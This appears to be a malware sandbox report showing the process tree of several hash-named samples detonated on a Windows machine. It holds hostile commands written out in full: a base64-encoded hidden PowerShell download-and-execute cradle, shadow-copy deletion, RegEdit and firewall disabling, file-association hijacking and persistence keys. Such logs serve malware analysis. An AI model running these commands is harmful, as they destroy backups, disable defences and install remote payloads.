C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8036 -prefsLen 32952 -prefMapHandle 8040 -prefMapSize 270279 -jsInitHandle 8044 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8052 -initialChannelId {44f8ba09-8d1b-41c3-ae8a-6f935b52ba8f} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 22 tab4⤵
- Checks processor information in registry
PID:7116
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8228 -prefsLen 32952 -prefMapHandle 8232 -prefMapSize 270279 -jsInitHandle 8236 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8244 -initialChannelId {56eb42ed-c588-4968-ae13-5426e5cbf55b} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 23 tab4⤵
- Checks processor information in registry
PID:7128
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8440 -prefsLen 32952 -prefMapHandle 8444 -prefMapSize 270279 -jsInitHandle 8448 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8456 -initialChannelId {347f31cb-dc05-45a1-9e9c-cfcb0520cf3a} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 24 tab4⤵
- Checks processor information in registry
PID:7152
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8600 -prefsLen 32952 -prefMapHandle 8604 -prefMapSize 270279 -jsInitHandle 8608 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5628 -initialChannelId {68a142d0-e6da-4bd3-899c-c2569c0a692c} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 25 tab4⤵
- Checks processor information in registry
PID:4224
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5896 -prefsLen 32952 -prefMapHandle 5892 -prefMapSize 270279 -jsInitHandle 6036 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8644 -initialChannelId {0baa711d-8e72-487e-b860-8b6e42b71519} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 26 tab4⤵
- Checks processor information in registry
PID:3576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8764 -prefsLen 32952 -prefMapHandle 8768 -prefMapSize 270279 -jsInitHandle 8772 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8776 -initialChannelId {e5de97bf-f7fe-4890-b67f-d106e8431157} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 27 tab4⤵
- Checks processor information in registry
PID:2496
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 8948 -prefsLen 32952 -prefMapHandle 8952 -prefMapSize 270279 -jsInitHandle 8956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 8964 -initialChannelId {b10f0107-0a23-4f05-8108-5774f6e1aab1} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 28 tab4⤵
- Checks processor information in registry
PID:6060
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7036 -prefsLen 32952 -prefMapHandle 7032 -prefMapSize 270279 -jsInitHandle 7028 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7016 -initialChannelId {07c18d23-d063-4651-b5b1-7a2bbaa160a5} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 29 tab4⤵
- Checks processor information in registry
PID:4656
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7656 -prefsLen 32952 -prefMapHandle 7632 -prefMapSize 270279 -jsInitHandle 7628 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7620 -initialChannelId {b429cafd-bdfa-4c8c-8539-d5807be5c49d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 30 tab4⤵
- Checks processor information in registry
PID:5048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7604 -prefsLen 32952 -prefMapHandle 7504 -prefMapSize 270279 -jsInitHandle 7516 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 7316 -initialChannelId {629840ce-9743-49bd-90e6-2165e5079fde} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 31 tab4⤵
- Checks processor information in registry
PID:1092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9312 -prefsLen 32952 -prefMapHandle 9316 -prefMapSize 270279 -jsInitHandle 9320 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9332 -initialChannelId {6d49cf93-407e-430d-b55f-f3b334e11bf0} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 32 tab4⤵
- Checks processor information in registry
PID:4420
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9344 -prefsLen 32952 -prefMapHandle 9348 -prefMapSize 270279 -jsInitHandle 9352 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9364 -initialChannelId {d6577547-e3e4-4cf3-b477-a9a14dbebd2d} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 33 tab4⤵PID:2416
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9376 -prefsLen 32952 -prefMapHandle 9380 -prefMapSize 270279 -jsInitHandle 9384 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9396 -initialChannelId {e776b697-df1c-4a1d-812d-7309cb88b64e} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 34 tab4⤵
- Checks processor information in registry
PID:4184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9880 -prefsLen 32952 -prefMapHandle 9884 -prefMapSize 270279 -jsInitHandle 9888 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9896 -initialChannelId {72582720-248b-4daa-b2a7-b64694aa2aba} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 35 tab4⤵
- Checks processor information in registry
PID:4768
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9908 -prefsLen 32952 -prefMapHandle 9912 -prefMapSize 270279 -jsInitHandle 9916 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9928 -initialChannelId {8d2cf194-9c33-46cd-aeb3-d22eb2e88bd8} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 36 tab4⤵
- Checks processor information in registry
PID:2468
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 9940 -prefsLen 32952 -prefMapHandle 9944 -prefMapSize 270279 -jsInitHandle 9948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 9956 -initialChannelId {31a6a4b3-960f-4aaf-878c-7208dc251229} -parentPid 4192 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4192" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 37 tab4⤵
- Checks processor information in registry
PID:1664
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\" -ad -an -ai#7zMap30351:190:7zEvent135462⤵PID:4348
-
-
C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6212 -
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" "/rC:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:7272 -
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w000002404⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6252 -
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w000002405⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7060 -
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe"C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe" /w000002406⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7656
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe2⤵PID:6268
-
C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exeC:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7276
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\" -ad -an -ai#7zMap21626:190:7zEvent46422⤵PID:7484
-
-
C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe"C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:5852 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:29032 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:29384
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet3⤵
- System Location Discovery: System Language Discovery
PID:29040
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet3⤵
- System Location Discovery: System Language Discovery
PID:29352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/2De1W63⤵PID:29412
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://iplogger.com/2De1W64⤵PID:29428
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\" -ad -an -ai#7zMap12901:190:7zEvent285052⤵PID:14032
-
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js2⤵
- Opens file in notepad (likely ransom note)
PID:14200
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d\4e2787f336b49f31472d1f83b653305e6fe58b37048694788743b01b297c144d.js"2⤵
- Checks computer location settings
PID:14304 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=3⤵PID:5432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=4⤵
- Command and Scripting Interpreter: PowerShell
PID:1780
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\" -ad -an -ai#7zMap29832:190:7zEvent39472⤵PID:7300
-
-
C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe"C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Windows directory
PID:14420
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HELP_DECRYPT_YOUR_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
PID:14636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ZeroLocker\ZeroRescue.exe2⤵PID:14856
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap6371:190:7zEvent129402⤵PID:15212
-
-
C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe"2⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:15308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C echo ^[autorun^] >autorun.inf3⤵
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
PID:5372
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C echo ^open^=KasperskyScan^.exe >>autorun.inf3⤵
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
PID:6820
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C echo ^execute=^KasperskyScan^.exe >>autorun.inf3⤵
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
PID:7848
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet && wmic shadowcopy delete3⤵
- System Location Discovery: System Language Discovery
PID:7472
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C taskkill /im taskmgr.exe /f3⤵
- System Location Discovery: System Language Discovery
PID:22864 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:22928
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C assoc .png=NotSoCleverBotFile3⤵
- System Location Discovery: System Language Discovery
PID:23312
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C assoc .vbs=NotSoCleverBotFile3⤵
- System Location Discovery: System Language Discovery
PID:23452
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C assoc .html=NotSoCleverBotFile3⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:23668
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C assoc .bat=NotSoCleverBotFile3⤵
- System Location Discovery: System Language Discovery
PID:23860
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C assoc .jpn=EncryptedFile3⤵
- System Location Discovery: System Language Discovery
PID:24004
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C assoc .js=exe1file3⤵
- System Location Discovery: System Language Discovery
PID:24200
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:24316 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f4⤵
- Disables RegEdit via registry modification
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:24432
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ipconfig /release3⤵
- System Location Discovery: System Language Discovery
PID:24508 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /release4⤵
- System Location Discovery: System Language Discovery
- Gathers network information
PID:24648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C net stop Windows Firewall3⤵
- System Location Discovery: System Language Discovery
PID:24744 -
C:\Windows\SysWOW64\net.exenet stop Windows Firewall4⤵
- System Location Discovery: System Language Discovery
PID:24892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Windows Firewall5⤵
- System Location Discovery: System Language Discovery
PID:24916
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C net stop Network Connections3⤵
- System Location Discovery: System Language Discovery
PID:25012 -
C:\Windows\SysWOW64\net.exenet stop Network Connections4⤵
- System Location Discovery: System Language Discovery
PID:25140 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Network Connections5⤵
- System Location Discovery: System Language Discovery
PID:25180
-
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap25546:190:7zEvent325052⤵PID:19608
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\" -ad -an -ai#7zMap14106:190:7zEvent85232⤵PID:19724
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\" -ad -an -ai#7zMap16342:190:7zEvent84032⤵PID:19776
-
-
C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe"C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:19832 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start %temp%\tmp1.jpg3⤵
- System Location Discovery: System Language Discovery
PID:19856 -
C:\Users\Admin\AppData\Local\Temp\tmp1.jpgC:\Users\Admin\AppData\Local\Temp\tmp1.jpg4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:19908
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start %temp%\tmp2.exe3⤵
- System Location Discovery: System Language Discovery
PID:19928 -
C:\Users\Admin\AppData\Local\Temp\tmp2.exeC:\Users\Admin\AppData\Local\Temp\tmp2.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:19984 -
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\tmp2.exe5⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:20104
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20028
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20180
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20264
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20344
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20424
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20508
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20588
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20668
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20748
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20828
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20912
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:20960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:20992
-
C:\Users\Admin\AppData\Roaming\Frfx\firefox.exeC:\Users\Admin\AppData\Roaming\Frfx\firefox.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:21040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe2⤵PID:21072
-
